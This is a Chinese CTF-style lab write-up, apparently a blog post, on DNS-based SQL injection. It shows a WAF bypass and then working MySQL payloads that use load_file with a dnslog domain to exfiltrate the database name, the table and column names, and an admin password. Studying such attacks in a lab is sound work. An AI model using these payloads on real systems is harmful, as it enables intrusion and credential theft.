dns注入

发现传参 id=1 order by 1 会被拦截

image
尝试利用白名单机制 1.txt 绕过,发现可以绕过检测。
image
order by 判断字段数,发现有两个字段
image
image
id=2 and 1=2 union select 1,2 发现没有输出点
image
盲注太过繁琐,可以尝试用dnslog 构造 id=2 and load_file(concat('//',(select database()),'.enxetj.dnslog.cn/abc')) -- qwe 刷新dnslog,发现数据库名为 manzhu,说明可以用dns注入
image
构造 id=2 and load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.ajroyb.dnslog.cn/abc')) -- qwe 查询表名,查到有admin和news表
image
构造 id=2 and load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1),'.ajroyb.dnslog.cn/abc')) -- qwe 查询字段,发现有三个字段 id,username,password
image
猜想flag可能会在password字段里,构造 id=2 and load_file(concat('//',(select password from admin limit 0,1),'.ajroyb.dnslog.cn/abc')) -- qwe 发现flag:1flag1good1
image

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • SQL注入之基于DNS的注入
    0x00前言 前段时间在做盲注 分别是基于时间和基于布尔型的 说真的 这两种盲注真的太繁琐了 都需要一个个的通过a...
    天下大木头阅读 8,413评论 0 1
  • SQL注入新手入门
    什么是SQL? SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。...
    RainClv阅读 3,928评论 0 1
  • SQL注入记录
    sql 注入 1.盲注 (没有回显)2.显错注入3.报错注入 显错注入-联合查询(Mysql数据库)的基本流程 显...
    Caeser_CC阅读 3,237评论 0 2
  • 扯下窗帘,阳光倾泻而下。
    渐变的面目拼图要我怎么拼? 我是疲乏了还是投降了? 不是不允许自己坠落, 我没有滴水不进的保护膜。 就是害怕变得面...
    闷热当乘凉阅读 9,783评论 0 13
  • 0906
    感觉自己有点神经衰弱,总是觉得手机响了;屋外有人走过;每次妈妈不声不响的进房间突然跟我说话,我都会被吓得半死!一整...
    章鱼的拥抱阅读 6,586评论 4 5